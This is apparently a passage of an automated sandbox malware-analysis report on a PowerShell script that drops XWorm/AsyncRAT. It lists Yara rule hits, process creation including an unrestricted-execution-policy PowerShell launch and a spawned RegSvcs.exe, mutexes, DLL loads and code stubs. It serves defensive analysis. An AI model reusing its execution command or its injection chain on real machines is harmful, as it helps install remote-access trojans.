            Malicious sample detected (through community Yara rule)
            Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.powershell.exe.272c85102e0.1.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.powershell.exe.272c85102e0.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.powershell.exe.272c9328660.2.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.powershell.exe.272c9328660.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.powershell.exe.272c85102e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.powershell.exe.272c85102e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.powershell.exe.272c9328660.2.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.powershell.exe.272c9328660.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000004.00000002.4599580483.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.2176808391.00000272C8338000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.2176808391.00000272C8F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.2176808391.00000272C8571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348940FA0_2_00007FFD348940FA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348951900_2_00007FFD34895190
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3489A5D90_2_00007FFD3489A5D9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3489D5CF0_2_00007FFD3489D5CF
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348979C40_2_00007FFD348979C4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34893E650_2_00007FFD34893E65
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3489D65D0_2_00007FFD3489D65D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34893BFB0_2_00007FFD34893BFB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0127B1784_2_0127B178
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012763404_2_01276340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012784B84_2_012784B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01275A704_2_01275A70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0127BEB84_2_0127BEB8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012757284_2_01275728
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01270FA04_2_01270FA0
            Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.272c85102e0.1.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.powershell.exe.272c85102e0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.272c9328660.2.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.powershell.exe.272c9328660.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.272c85102e0.1.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.powershell.exe.272c85102e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.272c9328660.2.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.powershell.exe.272c9328660.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000004.00000002.4599580483.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.2176808391.00000272C8338000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.2176808391.00000272C8F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.2176808391.00000272C8571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: classification engineClassification label: mal100.troj.evad.winPS1@4/5@1/1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\aaFTu0nm8LZLCn72
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2616:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wef4roxy.0ja.ps1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
            Source: 176.113.115.170.ps1Virustotal: Detection: 9%
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.2207246498.00000272E0650000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.2176808391.00000272C8338000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2176808391.00000272C8F71000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348909CA push E85D605Dh; ret 0_2_00007FFD348909F9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3489540F push ds; retf 0_2_00007FFD34895411
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34894C00 push E8FFFFFFh; iretd 0_2_00007FFD34894C0D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3489D7CD push E8000020h; ret 0_2_00007FFD3489D7F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01278080 push eax; iretd 4_2_01278081
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01274CC8 pushad ; retf 4_2_01274CD1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
